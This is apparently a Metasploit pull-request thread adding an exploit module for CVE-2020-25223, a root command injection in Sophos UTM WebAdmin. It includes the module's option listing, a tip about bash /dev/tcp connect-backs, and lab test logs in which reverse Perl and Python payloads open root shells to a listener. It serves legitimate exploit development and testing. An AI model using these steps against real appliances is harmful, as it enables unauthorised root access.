Add Sophos UTM CVE-2020-25223 exploit

[wvu]

msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > info

       Name: Sophos UTM WebAdmin SID Command Injection
     Module: exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-09-18

Provided by:
  Justin Kennedy
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 first-attempt-fail

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      4444             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an SID-based command injection in Sophos UTM's
  WebAdmin interface to execute shell commands as the root user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-25223
  https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce
  https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
  https://attackerkb.com/assessments/d6e0dff3-dd46-4f19-831d-c3f3f2fa972a

msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) >

[darrenmartyn]

In testing I found the bash /dev/tcp method was the most reliable way to get a connect back: see https://github.com/darrenmartyn/sophucked/blob/main/sophucked.py

Might be worth supporting that in the module?

[wvu]

@darrenmartyn: I wouldn't be surprised, but I'd rather fix the payload than every module where it applies. IOW, we have the support; it's Metasploit itself that's broken. There's also still cmd/unix/generic, so you can run any payload you want. #14490 is relevant.

Did you test a Perl reverse shell? The system is built on Perl. I selected the default payload based on that, but there's always room for improvement.

Update: #15875 should fix this issue.

[smcintyre-r7]

Everything appears to be working correctly. I tested the check method against a vulnerable and patched instance as well as multiple payloads.

Testing Output

msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > show options 

Module options (exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.203  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      4444             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  443              yes       The listen port
   SHELL  /bin/bash        yes       The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.159.128:443 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing cmd/unix/reverse_python (Unix Command)
[*] Command shell session 3 opened (192.168.159.128:443 -> 192.168.159.203:58668 ) at 2021-10-25 16:03:48 -0400

id
uid=0(root) gid=0(root) groups=0(root)
ls
Upgrade
certs
confd-qrunner.pid
confd.plx
config.pm
dev
etc
master.pid
queuer.pid
res
var
which python
/usr/bin/python
^C
Abort session 3? [y/N]  y

[*] 192.168.159.203 - Command shell session 3 closed.  Reason: User exit
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set PAYLOAD cmd/unix/generic 
PAYLOAD => cmd/unix/generic
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set CMD touch /tmp/spencer_was_here
CMD => touch /tmp/spencer_was_here
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing cmd/unix/generic (Unix Command)
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set PAYLOAD cmd/unix/reverse_p
set PAYLOAD cmd/unix/reverse_perl        set PAYLOAD cmd/unix/reverse_perl_ssl    set PAYLOAD cmd/unix/reverse_php_ssl     set PAYLOAD cmd/unix/reverse_python      set PAYLOAD cmd/unix/reverse_python_ssl  
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.159.128:443 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing cmd/unix/reverse_perl (Unix Command)
[*] Command shell session 4 opened (192.168.159.128:443 -> 192.168.159.203:58669 ) at 2021-10-25 16:10:09 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a 
Linux utm.home.lan 3.12.74-0.292688430.ga5ef2ae.rb5-smp64 #1 SMP Fri Jun 1 10:21:03 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
ls /tmp
host_cache.db
host_cache.db.lock
pdk-httpproxy
pdk-root
postgres.log
reverse_dns.db
reverse_dns.db.lock
reversednsresolver.log
spencer_was_here
up2date_auth_failure
vmware-root
^C
Abort session 4? [y/N]  y

[*] 192.168.159.203 - Command shell session 4 closed.  Reason: User exit
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set RHOSTS 192.168.159.201
RHOSTS => 192.168.159.201
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > check
[*] 192.168.159.201:4444 - The target is not exploitable. Failed to test command injection.
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) >

[wvu]

I'll be adding additional documentation as per @smcintyre-r7's suggestion. Thanks.

[wvu]

@smcintyre-r7, cleared to land runway master. 🛩️

[smcintyre-r7]

Release Notes

This adds an exploit for CVE-2020-25223 which is an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation results in OS command execution as the root user.

[wvu]

See rapid7/rex-core#17.